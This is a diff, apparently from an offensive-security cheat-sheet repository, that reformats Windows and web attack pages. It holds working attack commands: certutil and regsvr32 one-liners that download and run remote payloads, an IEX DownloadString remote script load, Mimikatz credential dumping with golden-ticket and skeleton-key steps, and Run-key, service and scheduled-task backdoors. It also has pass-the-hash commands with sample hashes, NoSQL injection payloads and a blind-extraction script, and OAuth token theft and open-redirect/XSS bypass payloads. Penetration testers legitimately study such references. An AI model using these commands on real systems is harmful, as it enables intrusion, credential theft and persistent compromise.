C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
|
||||
```
|
||||
|
||||
## Regsvr32 @subTee
|
||||
```
|
||||
|
||||
```powershell
|
||||
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
||||
```
|
||||
|
||||
```
|
||||
```powershell
|
||||
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
||||
```
|
||||
|
||||
## Odbcconf
|
||||
```
|
||||
|
||||
```powershell
|
||||
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
||||
```
|
||||
|
||||
|
||||
## Msbuild
|
||||
```
|
||||
|
||||
```powershell
|
||||
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
|
||||
```
|
||||
|
||||
## Certutil
|
||||
```
|
||||
|
||||
```powershell
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
|
||||
```
|
||||
|
||||
```
|
||||
```powershell
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
## Thanks to
|
||||
* [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
@ -3,12 +3,15 @@
|
||||
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
|
||||
|
||||
## Mimikatz basic
|
||||
|
||||
Only one command
|
||||
|
||||
```bash
|
||||
PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
|
||||
```
|
||||
|
||||
Mimikatz console (multiple commands)
|
||||
|
||||
```bash
|
||||
PS C:\temp\mimikatz> .\mimikatz
|
||||
mimikatz # privilege::debug
|
||||
@ -20,14 +23,16 @@ mimikatz_command -f sekurlsa::wdigest
|
||||
```
|
||||
|
||||
Mimikatz Golden ticket
|
||||
```
|
||||
|
||||
```powershell
|
||||
.\mimikatz kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
|
||||
|
||||
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
|
||||
```
|
||||
|
||||
Mimikatz Skeleton key
|
||||
```
|
||||
|
||||
```powershell
|
||||
privilege::debug
|
||||
misc::skeleton
|
||||
|
||||
@ -37,8 +42,8 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
|
||||
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
||||
```
|
||||
|
||||
|
||||
## Mimikatz commands
|
||||
|
||||
| Command |Definition|
|
||||
|:----------------:|:---------------|
|
||||
| CRYPTO::Certificates|list/export certificates|
|
||||
@ -64,16 +69,18 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
||||
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|
||||
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
|
||||
|
||||
|
||||
|
||||
## Powershell Mimikatz
|
||||
|
||||
Mimikatz in memory (no binary on disk) with :
|
||||
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
|
||||
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit
|
||||
|
||||
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
|
||||
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit
|
||||
|
||||
More informations can be grabbed from the Memory with :
|
||||
- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
|
||||
|
||||
- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
|
||||
|
||||
## Thanks to
|
||||
* [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
|
||||
* [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
|
||||
|
||||
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
|
||||
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
|
||||
|
@ -3,21 +3,26 @@
|
||||
## Userland
|
||||
|
||||
### Registry
|
||||
|
||||
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
|
||||
```
|
||||
|
||||
```powershell
|
||||
Value name: Backdoor
|
||||
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
||||
```
|
||||
|
||||
### Startup
|
||||
|
||||
Create a batch script in the user startup folder.
|
||||
```
|
||||
|
||||
```powershell
|
||||
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
|
||||
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
||||
```
|
||||
|
||||
### Scheduled Task
|
||||
```
|
||||
|
||||
```powershell
|
||||
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
|
||||
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
|
||||
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
|
||||
@ -26,25 +31,30 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
|
||||
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||
```
|
||||
|
||||
|
||||
## Elevated
|
||||
|
||||
### HKLM
|
||||
|
||||
Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
|
||||
```
|
||||
|
||||
```powershell
|
||||
Value name: Backdoor
|
||||
Value data: C:\Windows\Temp\backdoor.exe
|
||||
```
|
||||
|
||||
### Services
|
||||
|
||||
Create a service that will start automatically or on-demand.
|
||||
```
|
||||
|
||||
```powershell
|
||||
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
|
||||
```
|
||||
|
||||
### Scheduled Tasks
|
||||
|
||||
Scheduled Task to run as SYSTEM, everyday at 9am.
|
||||
```
|
||||
|
||||
```powershell
|
||||
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
|
||||
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
|
||||
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
|
||||
@ -53,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
|
||||
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
||||
|
||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
@ -1,24 +1,27 @@
|
||||
# Windows - Privilege Escalation
|
||||
|
||||
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
|
||||
|
||||
|
||||
## Windows Version and Configuration
|
||||
|
||||
```powershell
|
||||
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
||||
```
|
||||
|
||||
Architecture
|
||||
|
||||
```powershell
|
||||
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
|
||||
```
|
||||
|
||||
|
||||
List all env variables
|
||||
|
||||
```powershell
|
||||
set
|
||||
```
|
||||
|
||||
List all drives
|
||||
|
||||
```powershell
|
||||
wmic logicaldisk get caption || fsutil fsinfo drives
|
||||
```
|
||||
@ -26,22 +29,26 @@ wmic logicaldisk get caption || fsutil fsinfo drives
|
||||
## User Enumeration
|
||||
|
||||
Get current username
|
||||
|
||||
```powershell
|
||||
echo %USERNAME% || whoami
|
||||
```
|
||||
|
||||
List all users
|
||||
|
||||
```powershell
|
||||
net user
|
||||
whoami /all
|
||||
```
|
||||
|
||||
List logon requirements; useable for bruteforcing
|
||||
|
||||
```powershell
|
||||
net accounts
|
||||
```
|
||||
|
||||
Get details about a user (i.e. administrator, admin, current user)
|
||||
|
||||
```powershell
|
||||
net user administrator
|
||||
net user admin
|
||||
@ -49,11 +56,13 @@ net user %USERNAME%
|
||||
```
|
||||
|
||||
List all local groups
|
||||
|
||||
```powershell
|
||||
net localgroup
|
||||
```
|
||||
|
||||
Get details about a group (i.e. administrators)
|
||||
|
||||
```powershell
|
||||
net localgroup administrators
|
||||
```
|
||||
@ -61,31 +70,37 @@ net localgroup administrators
|
||||
## Network Enumeration
|
||||
|
||||
List all network interfaces
|
||||
|
||||
```powershell
|
||||
ipconfig /all
|
||||
```
|
||||
|
||||
List current routing table
|
||||
|
||||
```powershell
|
||||
route print
|
||||
```
|
||||
|
||||
List the ARP table
|
||||
|
||||
```powershell
|
||||
arp -A
|
||||
```
|
||||
|
||||
List all current connections
|
||||
|
||||
```powershell
|
||||
netstat -ano
|
||||
```
|
||||
|
||||
List firware state and current configuration
|
||||
|
||||
```powershell
|
||||
netsh advfirewall firewall dump
|
||||
```
|
||||
|
||||
List all network shares
|
||||
|
||||
```powershell
|
||||
net share
|
||||
```
|
||||
@ -93,28 +108,34 @@ net share
|
||||
## Looting for passwords
|
||||
|
||||
### Search for file contents**
|
||||
|
||||
```powershell
|
||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||
```
|
||||
|
||||
### Search for a file with a certain filename
|
||||
|
||||
```powershell
|
||||
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||||
```
|
||||
|
||||
### Search the registry for key names
|
||||
|
||||
```powershell
|
||||
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||||
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||
```
|
||||
|
||||
### Read a value of a certain sub key
|
||||
|
||||
```powershell
|
||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||
```
|
||||
|
||||
### Password in unattend.xml
|
||||
|
||||
Location of the unattend.xml files
|
||||
|
||||
```powershell
|
||||
C:\unattend.xml
|
||||
C:\Windows\Panther\Unattend.xml
|
||||
@ -124,12 +145,13 @@ C:\Windows\system32\sysprep\sysprep.xml
|
||||
```
|
||||
|
||||
Example content
|
||||
|
||||
```powershell
|
||||
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
|
||||
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
|
||||
<AutoLogon>
|
||||
<Password>*SENSITIVE*DATA*DELETED*</Password>
|
||||
<Enabled>true</Enabled>
|
||||
<Username>Administrateur</Username>
|
||||
<Enabled>true</Enabled>
|
||||
<Username>Administrateur</Username>
|
||||
</AutoLogon>
|
||||
|
||||
<UserAccounts>
|
||||
@ -142,47 +164,57 @@ Example content
|
||||
</LocalAccounts>
|
||||
</UserAccounts>
|
||||
```
|
||||
|
||||
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
|
||||
|
||||
## Processes Enum
|
||||
|
||||
What processes are running?
|
||||
|
||||
```powershell
|
||||
tasklist /v
|
||||
```
|
||||
|
||||
Which processes are running as "system"
|
||||
|
||||
```powershell
|
||||
tasklist /v /fi "username eq system"
|
||||
```
|
||||
|
||||
Do you have powershell magic?
|
||||
|
||||
```powershell
|
||||
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||||
```
|
||||
|
||||
|
||||
## Uploading / Downloading files
|
||||
|
||||
a wget using powershell
|
||||
|
||||
```powershell
|
||||
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
|
||||
```
|
||||
|
||||
wget using bitsadmin (when powershell is not present)
|
||||
|
||||
```powershell
|
||||
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
|
||||
```
|
||||
|
||||
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
|
||||
|
||||
```powershell
|
||||
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
|
||||
```
|
||||
|
||||
## Spot the weak service using PowerSploit's PowerUP
|
||||
|
||||
```powershell
|
||||
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||
|
@ -1,25 +1,30 @@
|
||||
# Windows - Using credentials
|
||||
|
||||
## TIP 1 - Create your credential :D
|
||||
|
||||
```powershell
|
||||
net user hacker hacker /add
|
||||
net localgroup administrators hacker /add
|
||||
```
|
||||
|
||||
Some info about your user
|
||||
|
||||
```powershell
|
||||
net user /dom
|
||||
net user /domain
|
||||
```
|
||||
|
||||
## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)
|
||||
|
||||
when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin
|
||||
|
||||
```powershell
|
||||
Username: RetailAdmin
|
||||
Password: trs10
|
||||
```
|
||||
|
||||
|
||||
## Metasploit - SMB
|
||||
|
||||
```c
|
||||
use auxiliary/scanner/smb/smb_login
|
||||
set SMBDomain CSCOU
|
||||
@ -31,7 +36,9 @@ creds
|
||||
```
|
||||
|
||||
## Metasploit - Psexec
|
||||
|
||||
Note: the password can be replaced by a hash to execute a `pass the hash` attack.
|
||||
|
||||
```c
|
||||
use exploit/windows/smb/psexec
|
||||
set RHOST 10.2.0.3
|
||||
@ -43,6 +50,7 @@ shell
|
||||
```
|
||||
|
||||
## Crackmapexec (Integrated to Kali)
|
||||
|
||||
```python
|
||||
git clone https://github.com/byt3bl33d3r/CrackMapExec.github
|
||||
python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
|
||||
@ -50,16 +58,19 @@ python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
|
||||
```
|
||||
|
||||
## Crackmapexec (Pass The Hash)
|
||||
```
|
||||
|
||||
```powershell
|
||||
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
|
||||
```
|
||||
|
||||
## Winexe (Integrated to Kali)
|
||||
|
||||
```python
|
||||
winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
|
||||
```
|
||||
|
||||
## Psexec.py / Smbexec.py / Wmiexec.py (Impacket)
|
||||
|
||||
```python
|
||||
git clone https://github.com/CoreSecurity/impacket.git
|
||||
python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||
@ -68,12 +79,14 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||
```
|
||||
|
||||
## RDP Remote Desktop Protocol (Impacket)
|
||||
|
||||
```powershell
|
||||
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
|
||||
```
|
||||
|
||||
Note: you may need to enable it with the following command
|
||||
|
||||
```powershell
|
||||
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||
netsh firewall set service remoteadmin enable
|
||||
@ -81,45 +94,51 @@ netsh firewall set service remotedesktop enable
|
||||
```
|
||||
|
||||
or with psexec(sysinternals)
|
||||
|
||||
```powershell
|
||||
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
or with crackmapexec
|
||||
|
||||
```powershell
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||
```
|
||||
|
||||
For Server 2012 R2, Win8.1+
|
||||
```
|
||||
|
||||
```powershell
|
||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
||||
```
|
||||
|
||||
with Metasploit
|
||||
|
||||
```powershell
|
||||
run getgui -u admin -p 1234
|
||||
```
|
||||
|
||||
|
||||
## Netuse (Windows)
|
||||
```
|
||||
|
||||
```powershell
|
||||
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
|
||||
C$
|
||||
```
|
||||
|
||||
## Runas (Windows - Kerberos auth)
|
||||
```
|
||||
|
||||
```powershell
|
||||
runas /netonly /user:CSCOU\jarrieta "cmd.exe"
|
||||
```
|
||||
|
||||
## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
|
||||
```
|
||||
|
||||
```powershell
|
||||
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
|
||||
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell
|
||||
```
|
||||
|
||||
|
||||
## Thanks
|
||||
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
||||
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||||
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
|
||||
|
||||
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
||||
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
|
||||
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
|
||||
|
@ -1,10 +1,12 @@
|
||||
# NoSQL injection
|
||||
|
||||
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||
```
|
||||
|
||||
```json
|
||||
in URL
|
||||
username[$ne]=toto&password[$ne]=toto
|
||||
|
||||
@ -12,17 +14,18 @@ in JSON
|
||||
{"username": {"$ne": null}, "password": {"$ne": null} }
|
||||
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
|
||||
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
|
||||
|
||||
```
|
||||
|
||||
Extract length information
|
||||
```
|
||||
|
||||
```json
|
||||
username[$ne]=toto&password[$regex]=.{1}
|
||||
username[$ne]=toto&password[$regex]=.{3}
|
||||
```
|
||||
|
||||
Extract data information
|
||||
```
|
||||
|
||||
```json
|
||||
in URL
|
||||
username[$ne]=toto&password[$regex]=m.{2}
|
||||
username[$ne]=toto&password[$regex]=md.{1}
|
||||
@ -38,6 +41,7 @@ in JSON
|
||||
```
|
||||
|
||||
## Blind NoSQL
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
@ -59,7 +63,8 @@ while True:
|
||||
```
|
||||
|
||||
## MongoDB Payloads
|
||||
```
|
||||
|
||||
```bash
|
||||
true, $where: '1 == 1'
|
||||
, $where: '1 == 1'
|
||||
$where: '1 == 1'
|
||||
@ -79,9 +84,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
[$ne]=1
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* https://www.dailysecurity.fr/nosql-injections-classique-blind/
|
||||
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection
|
||||
* https://github.com/cr0hn/nosqlinjection_wordlists
|
||||
* https://zanon.io/posts/nosql-injection-in-mongodb
|
||||
|
||||
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
|
||||
* [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
|
||||
* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
|
||||
* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
|
||||
|
@ -1,48 +1,54 @@
|
||||
# OAuth 2 - Common vulnerabilities
|
||||
|
||||
## Grabbing OAuth Token via redirect_uri
|
||||
|
||||
Redirect to a controlled domain to get the access token
|
||||
```
|
||||
|
||||
```powershell
|
||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
|
||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
|
||||
```
|
||||
|
||||
Redirect to an accepted Open URL in to get the access token
|
||||
```
|
||||
|
||||
```powershell
|
||||
https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
|
||||
https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F
|
||||
```
|
||||
|
||||
OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” can’t be pointed to an Open Redirect.
|
||||
|
||||
|
||||
Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
|
||||
```
|
||||
|
||||
```powershell
|
||||
https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
|
||||
```
|
||||
|
||||
## Executing XSS via redirect_uri
|
||||
```
|
||||
|
||||
```powershell
|
||||
https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state=<script>alert('XSS')</script>
|
||||
```
|
||||
|
||||
## OAuth private key disclosure
|
||||
|
||||
Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.
|
||||
|
||||
## Authorization Code Rule Violation
|
||||
```
|
||||
The client MUST NOT use the authorization code more than once.
|
||||
|
||||
> The client MUST NOT use the authorization code more than once.
|
||||
If an authorization code is used more than once, the authorization server MUST deny the request
|
||||
and SHOULD revoke (when possible) all tokens previously issued based on that authorization code.
|
||||
```
|
||||
|
||||
## Cross-Site Request Forgery
|
||||
Applications that do not check for a valid CSRF token in the OAuth callback are vulnerable. This can be exploited by initializing the OAuth flow and intercepting the callback (https://example.com/callback?code=AUTHORIZATION_CODE). This URL can be used in CSRF attacks.
|
||||
```
|
||||
The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
|
||||
```
|
||||
|
||||
Applications that do not check for a valid CSRF token in the OAuth callback are vulnerable. This can be exploited by initializing the OAuth flow and intercepting the callback (`https://example.com/callback?code=AUTHORIZATION_CODE`). This URL can be used in CSRF attacks.
|
||||
|
||||
> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
|
||||
|
||||
## Thanks to
|
||||
* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
|
||||
* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
|
||||
* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
|
||||
* http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html
|
||||
|
||||
* [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
|
||||
* [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)
|
||||
* [How I hacked Github again. - Egor Homakov](http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html)
|
||||
* [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka](http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html)
|
||||
|
@ -1,82 +1,95 @@
|
||||
# Open URL Redirection
|
||||
|
||||
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
|
||||
|
||||
## Fuzzing
|
||||
|
||||
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
|
||||
|
||||
To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
|
||||
```
|
||||
|
||||
```powershell
|
||||
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
|
||||
Using a whitelisted domain or keyword
|
||||
```
|
||||
|
||||
```powershell
|
||||
www.whitelisted.com.evil.com redirect to evil.com
|
||||
```
|
||||
|
||||
Using CRLF to bypass "javascript" blacklisted keyword
|
||||
```
|
||||
|
||||
```powershell
|
||||
java%0d%0ascript%0d%0a:alert(0)
|
||||
```
|
||||
|
||||
Using "//" to bypass "http" blacklisted keyword
|
||||
```
|
||||
|
||||
```powershell
|
||||
//google.com
|
||||
```
|
||||
|
||||
Using "https:" to bypass "//" blacklisted keyword
|
||||
```
|
||||
|
||||
```powershell
|
||||
https:google.com
|
||||
```
|
||||
|
||||
Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
|
||||
```
|
||||
|
||||
```powershell
|
||||
\/\/google.com/
|
||||
/\/google.com/
|
||||
```
|
||||
|
||||
|
||||
Using "%E3%80%82" to bypass "." blacklisted character
|
||||
```
|
||||
|
||||
```powershell
|
||||
//google%E3%80%82com
|
||||
```
|
||||
|
||||
|
||||
Using null byte "%00" to bypass blacklist filter
|
||||
```
|
||||
|
||||
```powershell
|
||||
//google%00.com
|
||||
```
|
||||
|
||||
Using "@" character, browser will redirect to anything after the "@"
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://www.theirsite.com@yoursite.com/
|
||||
```
|
||||
|
||||
Creating folder as their domain
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://www.yoursite.com/http://www.theirsite.com/
|
||||
http://www.yoursite.com/folder/www.folder.com
|
||||
```
|
||||
|
||||
|
||||
XSS from Open URL - If it's in a JS variable
|
||||
```
|
||||
|
||||
```powershell
|
||||
";alert(0);//
|
||||
```
|
||||
|
||||
XSS from data:// wrapper
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
|
||||
```
|
||||
|
||||
XSS from javascript:// wrapper
|
||||
```
|
||||
|
||||
```powershell
|
||||
http://www.example.com/redirect.php?url=javascript:prompt(1)
|
